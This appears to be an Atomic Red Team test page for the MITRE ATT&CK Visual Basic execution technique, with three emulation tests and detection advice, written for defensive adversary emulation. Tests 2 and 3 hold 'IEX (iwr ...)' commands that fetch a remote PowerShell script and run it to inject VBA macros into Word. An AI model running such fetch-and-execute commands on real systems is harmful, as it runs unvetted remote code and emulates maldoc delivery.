# T1059.005 - Command and Scripting Interpreter: Visual Basic
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )

## Atomic Tests

### Atomic Test #1 - Visual Basic script execution to gather local computer information
Visual Basic execution test, execute vbscript via PowerShell.

When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Sample script must exist on disk at specified location (#{vbscript})
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1059.005\src\sys_info.vbs) {exit 0} else {exit 1} 
```
##### Get Prereq Commands:
```powershell
New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1059.005\src\sys_info.vbs) -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "PathToAtomicsFolder\T1059.005\src\sys_info.vbs"
```

In [ ]:
Invoke-AtomicTest T1059.005 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cscript PathToAtomicsFolder\T1059.005\src\sys_info.vbs > $env:TEMP\T1059.005.out.txt```

In [ ]:
Invoke-AtomicTest T1059.005 -TestNumbers 1

### Atomic Test #2 - Encoded VBS code execution
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"

A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The 64-bit version of Microsoft Office must be installed

##### Check Prereq Commands:
```powershell
try {
  $wdApp = New-Object -COMObject "Word.Application"
  $path = $wdApp.Path
  Stop-Process -Name "winword"
  if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1059.005 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
```

In [ ]:
Invoke-AtomicTest T1059.005 -TestNumbers 2

### Atomic Test #3 - Extract Memory via VBA
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1059.005 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
```

In [ ]:
Invoke-AtomicTest T1059.005 -TestNumbers 3

## Detection
Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.

Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.